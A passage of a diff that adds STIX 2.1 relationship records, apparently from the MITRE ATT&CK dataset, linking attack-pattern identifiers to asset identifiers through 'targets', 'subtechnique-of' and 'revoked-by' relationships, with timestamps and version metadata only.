"object_marking_refs": [], + "modified": "2024-06-27T09:34:02.226Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc2d4695-f0af-4acc-910a-3b6b1d24b9a9", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc3236cd-bb26-4505-b546-0f755280ec16", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc38e6bc-2505-43b1-a24c-72ad53799d75", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc51299b-bea5-4e00-a9ac-c7611baf9b42", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc571477-5b1a-4246-a8eb-a1afbf7c19b2", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc5c77ce-c5a3-4791-b80e-09d35282443a", + "created": "2023-09-29T16:30:08.166Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:30:08.166Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc62dd55-922b-4045-91a9-664bc26bfa8f", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc68a734-75b9-446c-a9c5-a44bf43a6140", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc7fa0b8-ed4d-4180-8538-679b3cd17fb9", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cc90397e-a432-4b67-a5e3-2fcd354ed746", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cca76350-4c75-48ec-bbad-396cef07cbb5", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ccbb44ad-2220-4260-99ce-9142c44fc797", + "created": "2023-09-28T21:10:03.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:10:03.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ccd1aede-7363-4955-b8b6-0420fa8cd380", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ccd84d62-e9f4-44b6-aee6-d6f0e5082a81", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ccdff6e8-75ea-4386-ab0f-435ac35ccc61", + "created": "2020-03-13T18:11:08.520Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ccf66588-d7f6-49dd-84ef-8e4673b2eff3", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd228bad-f797-4d32-a510-d601b58553f6", + "created": "2019-12-12T14:59:58.329Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd470883-ce11-45e2-a18c-1282fa5e898e", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd4ec048-f2d5-4be4-86ec-54d797ce6147", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd54b7ba-c96c-49c8-90d2-15677efb8fe2", + "created": "2023-09-28T20:15:56.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:15:56.470Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd584517-10b1-427b-810d-0429ab2315e6", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd6e3317-4980-473b-a789-ea4acfb6da48", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd804675-30f9-47e2-aa7f-d2f67740b88d", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd958638-07f3-4c7f-acf3-404195d3a325", + "created": "2020-03-14T23:25:21.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--7d751199-05fa-4a72-920f-85df4506c76c", + "target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd977936-fd0e-478f-8858-03ffe1560552", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cd9cd4a4-9178-4215-874e-ac0e78a5bc6d", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cdd407cd-3710-4d59-b35d-0a5da31b5211", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cddb90c7-80be-4c1a-8aa4-10fe0c1a524f", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cdece19a-64c0-4438-8f7b-5026386f9de2", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cdee1f70-4549-4fde-9d1c-6280b07b3fc6", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cdff9c58-3f55-48d3-9169-3d25ebf65841", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ce0451bb-ac9d-44d8-91e7-19496f7095b5", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ce0e07ce-4b1d-424c-8b5c-5cc1680de561", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ce39dc03-c3aa-4c6b-9edb-c05c3b934cbd", + "created": "2020-03-11T14:43:31.829Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ce3aad7e-1e15-40c7-916b-e25a647e9986", + "created": "2023-09-29T16:31:36.462Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:31:36.462Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ce3cdb41-14b6-48e0-8210-bae2aebf79f6", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ce588980-e885-4df9-9cb8-56cb2045cab7", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ce7b36d5-2fa7-42d3-a0e1-d5ba37b2bc99", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": 